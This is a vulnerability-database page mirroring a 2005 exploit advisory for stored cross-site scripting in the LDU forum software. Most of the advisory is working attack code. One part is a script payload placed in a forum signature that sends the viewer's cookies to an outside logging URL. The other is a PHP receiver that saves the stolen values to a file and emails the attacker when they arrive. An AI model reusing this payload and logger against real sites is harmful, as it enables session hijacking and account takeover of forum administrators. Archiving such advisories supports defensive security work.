Lucene search

lduXSS2.txt

🗓️ 31 Aug 2005 00:00:00Reported by spyMASterType

packetstorm🔗 packetstormsecurity.com👁 20 Views

There are XSS vulnerabilities in LDU allowing cookie theft and redirection when admin views certain forum posts

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`Bug finder:spyMASter  
Web site:Realhackers.net  
Contact:[email protected]  
  
LDU has some xss vulns   
Firstly you can use html codes in your signature you can get cookies with this  
put your signature that code  
  
<SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)</SCRIPT>  
  
and post a topic to forum when admin look this topic she/he redirect and you can get cookie  
  
this is codes of ekle.php you can save cookie to a with this php code  
  
  
<?php  
$kayit = fopen("spymaster.txt","a");  
foreach($_GET as $variable => $value) {  
fwrite($kayit,$variable . ": " . $value . "\n");  
}  
fwrite($kayit,"---------------------------\n");  
fclose($kayit);  
mail("[email protected]","your cookie ready","http://www.realhackers.net/spyoku.txt",'From: [email protected]');  
?>  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

31 Aug 2005 00:00Current

7.4High risk

Vulners AI Score7.4